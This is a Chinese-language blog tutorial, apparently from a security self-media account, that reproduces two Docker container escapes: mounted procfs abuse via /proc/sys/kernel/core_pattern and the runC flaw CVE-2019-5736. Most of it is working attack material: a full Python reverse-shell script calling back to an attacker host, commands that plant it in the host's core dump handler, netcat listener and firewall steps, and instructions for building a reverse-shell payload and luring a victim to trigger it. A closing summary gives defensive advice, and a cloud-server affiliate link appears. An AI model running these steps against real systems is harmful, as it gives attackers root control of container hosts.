Docker逃逸CVE-2019-5736、procfs云安全漏洞复现,全文5k字,超详细解析!
Docker逃逸CVE-2019-5736、procfs云安全漏洞复现,全文5k字,超详细解析!
Docker容器挂载 (伪文件系统)procfs 逃逸
procfs
是展示系统进程状态的虚拟文件系统,包含敏感信息。直接将其挂载到不受控的容器内,特别是容器默认拥有root
权限且未启用用户隔离时,将极大地增加安全风险。因此,需谨慎处理,确保容器环境安全隔离。
利用文件/proc/sys/kernel/core_pattern
它在Linux系统中,如果进程崩溃了,系统内核会捕获到进程崩溃信息,将进程崩溃信息传递给这个文件中的程序或者脚本。
自Linux内核2.6.19版本起,/proc/sys/kernel/core_pattern
配置迎来了新扩展。若此文件首字符为管道符'|',紧随其后的内容即被识别为指向用户空间程序或脚本的指令,系统将在生成核心转储时自动调用执行这些外部程序或脚本。这一特性增强了核心转储处理的灵活性与定制化能力。
漏洞复现
1、漏洞环境搭建
创建一个容器并挂载 /proc 目录
docker run -it --rm -v /proc/:/host/ ubuntu
执行以下命令,如果返回 Procfs is mounted. 说明当前挂载了 procfs,如果返回 Procfs is not mounted. 则说明没有挂载。
find / -name core_pattern 2>/dev/null | wc -l | grep -q 2 && echo "Procfs is mounted." || echo "Procfs is not mounted."
漏洞利用
# 安装gcc c文件是执行不了的,需要安装gcc来执行c文件
apt update && apt install -y gcc
反弹shell脚本
cat > /tmp/.t.py <<EOF
#!/usr/bin/python
import os
import pty
import socket
lhost = "反弹shell的攻击机ip"
lport = 8888
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
os.putenv("HISTFILE", '/dev/null')
pty.spawn("/bin/bash")
# os.remove('/tmp/.t.py')
s.close()
if __name__ == "__main__":
main()
EOF
赋予执行权限
chmod 777 /tmp/.t.py
Linux核心转储程序通过宿主机文件系统执行,利用/etc/mtab
中upperdir
定位容器挂载点。容器未提交的文件变动,在此宿主机路径上可见。
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
写入反弹shell
echo -e "|$host_path/tmp/.t.py \rcore" > /host/sys/kernel/core_pattern
在攻击机上开启一个监听
nc -lvvp 8888
然后在容器里运行一个可以崩溃的程序
cat > /tmp/t.c <<EOF
#include<stdio.h>
int main(void) {
int *a = NULL;
*a = 1;
return 0;
}
EOF
# 编译程序并执行
cd /tmp
gcc t.c -o t && ./t
如果出现了如下情况,攻击机也没有反应,那么多半是因为攻击机器没有放行8888端口
kali放行8888端口,使用iptables
iptables -A INPUT -p tcp --dport 8888 -j ACCEPT
此时重新执行c文件
./t
# 或者
gcc t.c -o t && ./t
攻击机器即可接收反弹的shell
Docker runC逃逸-CVE-2019-5736
概述:
2019年2月,runC维护团队披露了一个严重安全漏洞CVE-2019-5736,由SUSE Linux的高级软件工程师Aleksa Sarai发现。此漏洞影响Docker、containerd、Podman、CRI-O等广泛使用的容器运行时,对IT环境和主流云平台如AWS、Google Cloud构成重大威胁。攻击者利用此漏洞可实现容器逃逸,获取宿主机的root权限,进而控制主机上的所有容器。
漏洞原理:
漏洞根源在于runC,一个作为容器底层运行时的开源工具,早期作为Docker的一部分开发,后独立出来。runC由高级别容器运行时(如Docker)调用,负责容器的创建与进程管理。在受影响版本中(Docker 18.09.2之前,runc版本低于1.0-rc6),攻击者可通过特定容器镜像或exec操作,获取宿主机上runC的文件句柄,进而篡改runc二进制文件。这一操作允许攻击者以root权限在宿主机上执行任意命令,实现完全控制。
影响版本
docker version <=18.09.2 RunC version <=1.0-rc6
环境安装
我这里是香港服务器 centos 7.9,一台攻击机腾讯云服务器
这里我推荐腾讯云服务器,新用户99元可以用一年,自带docker加速服务,当靶场必备===>https://curl.qcloud.com/T7dJtWo1
依次执行如下命令,即可安装成功docker-18.03.1
sudo yum update -y
sudo yum install -y yum-utils device-mapper-persistent-data lvm2
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum install -y docker-ce-18.03.1.ce
sudo systemctl start docker
sudo systemctl enable docker
docker --version
Tips:6月开始国内大部分docker源都不能使用了,要么使用香港或者国外操作系统,或者推荐龙蜥操作系统,就算搭建本地也自带外网加速
这里docker版本原因,pull不了镜像,可以pull本地,这里我准备好了一个docker可以直接用的ubuntu镜像,【小羽网安】后台回复即【ubuntu】,小伙伴们不要回复错奥,ubuntu,ubuntu,ubuntu~
将自己下载的ubuntu.tar上传到自己的靶机上,使用docker加载本地镜像
docker load -i ubuntu.tar
启动示例
docker run -d --name my_ubuntu_container ubuntu /bin/bash -c "tail -f /dev/null"
漏洞复现
第一步:生成payload
下载CVE-2019-5736编译go脚本生成攻击payload。(https://github.com/Frichetten/CVE-2019-5736-PoC),将go脚本中的命令修改为反弹shell(附件)
将此内容进行更改,设置nc监听地址。
编译生成payload(需要go环境,yum install go
) ,也叫可执行文件,为linux系统
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
建议打快照,漏洞复现完成会造成docker无法使用。
第二步:开始攻击
将该payload拷贝到docker容器中(这就是模拟攻击者获取了docker容器权限,在容器中上传payload进行docker逃逸)
docker cp main df9370449f96:/home #拷贝
docker exec -it df9370449f96 /bin/bash #进入该ubuntu容器
执行payload,等待受害者去启动docker容器。
攻击机器开启瑞士军刀监听之前先放行1234端口
[root@lavm-izz8p5423g CVE-2019-5736-PoC-master]# systemctl start firewalld
[root@lavm-izz8p5423g CVE-2019-5736-PoC-master]# sudo firewall-cmd --zone=public --add-port=1234/tcp --permanent
success
开启监听
诱导受害机重新进入容器。(bash/sh启动)
受害者启动docker容器时,触发payload,成功反弹shell。
whoami,漏洞利用成功
总结
本文详细展示了两种Docker容器安全漏洞的复现过程,分别是通过伪文件系统procfs的逃逸攻击和CVE-2019-5736 runC逃逸漏洞。这两种攻击均利用了容器与宿主机之间的不当隔离或软件缺陷,实现了从容器内部向宿主机环境的非法访问和控制。
procfs逃逸攻击总结
- 漏洞原理:通过挂载宿主机的
/proc
目录到容器内,攻击者能够访问并修改宿主机上的关键系统文件,如/proc/sys/kernel/core_pattern
,从而在进程崩溃时执行任意代码。 - 复现步骤:
- 创建一个挂载
/proc
目录的Docker容器。 - 在容器内安装gcc并编写反弹shell的Python脚本。
- 修改宿主机上的
/proc/sys/kernel/core_pattern
文件,使其指向容器内的反弹shell脚本。 - 在容器内制造进程崩溃,触发核心转储机制,执行反弹shell脚本,从而在攻击机上获得宿主机的shell访问权限。
- 创建一个挂载
- 防御建议:
- 避免将宿主机的敏感目录(如
/proc
)挂载到容器中。 - 容器应运行在非特权用户模式下,限制其对宿主机的访问权限。
- 监控并审计容器内的活动,及时发现异常行为。
- 避免将宿主机的敏感目录(如
CVE-2019-5736 runC逃逸漏洞总结
- 漏洞原理:在受影响的Docker和runC版本中,攻击者可以通过特定容器镜像或exec操作获取宿主机上runC的文件句柄,进而篡改runc二进制文件,实现以root权限执行任意命令。
- 复现步骤:
- 在受影响的Docker环境中安装并运行易受攻击的容器。
- 编译并准备用于漏洞利用的payload(一个Go语言编写的可执行文件)。
- 将payload拷贝到容器中并执行,等待宿主机上的Docker活动触发payload。
- 在攻击机上监听特定端口,当受害机上的Docker活动触发payload时,成功接收反弹的shell。
- 防御建议:
- 及时更新Docker和runC到最新版本,避免使用已知存在漏洞的旧版本。
- 实施最小权限原则,限制容器内进程的运行权限。
- 使用容器安全扫描工具定期检测容器镜像和运行时环境中的潜在漏洞。
- 对宿主机和容器进行严格的访问控制和隔离,减少潜在的攻击面。
通过本文的复现过程,我们可以深刻认识到容器安全的重要性以及及时更新和维护软件版本的必要性。随着容器技术的广泛应用,确保容器环境的安全将成为IT运维和安全团队的重要任务。